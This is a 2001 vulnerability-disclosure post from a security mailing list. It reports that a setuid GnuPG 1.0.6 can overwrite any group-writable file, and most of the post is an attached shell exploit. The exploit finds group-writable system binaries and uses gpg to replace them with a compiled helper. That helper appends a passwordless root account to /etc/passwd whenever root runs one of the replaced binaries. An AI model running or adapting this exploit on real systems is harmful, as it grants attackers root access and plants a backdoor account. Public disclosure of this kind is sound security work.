Vulnerability Development mailing list archives
Possible problem with GnuPG 1.0.6
From: Przemyslaw Frasunek <venglin () freebsd lublin pl>
Date: Sat, 29 Dec 2001 09:59:06 +0100
Hello, I've just found out strange behaviour with GnuPG 1.0.6 installed setuid (default on Mandrake, probably others?). When decrypting file, it allows to overwrite any group-writeable file in system. It works for me on Mandrake 8.1, because few system binaries are installed group-writeable (especially smbmount and smbumount). Exploit attached. #!/bin/sh # babcia padlina 2001 # especially for pcoa :) # # GnuPG when installed setuid allows overwriting any group-writable # files. # # Tested on generic Mandrake 8.1 if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then echo "GnuPG not installed or not setuid." exit 1 fi if [ ! -x /usr/bin/gcc ]; then echo "gcc not installed." exit 1 fi echo "Looking for group-writeable binaries..." echo BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 2>/dev/null` if [ "X$BINS" != "X" ]; then echo "$BINS" else echo "Sorry, this system is not exploitable." exit 1 fi echo echo "Compiling helper binary..." echo cat > own.c << __EOF__ main() { if (!getuid()) { system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd"); } } __EOF__ /usr/bin/gcc -o own own.c > /dev/null 2>&1 if [ ! -x own ]; then echo "Compilation failed." exit 1 fi rm -f own.c echo "Overwriting binaries... Please confirm each one." echo for i in $BINS; do rm -f own.gpg echo owned | gpg --passphrase-fd 0 -c own echo owned | gpg --passphrase-fd 0 -o $i own.gpg done rm -f own own.gpg echo echo "Looks like everything is done. When root will run any of above" echo "binaries, user babunia will be added with root privs." -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *
Current thread:
- Possible problem with GnuPG 1.0.6 Przemyslaw Frasunek (Dec 29)
- Re: Possible problem with GnuPG 1.0.6 Przemyslaw Frasunek (Dec 29)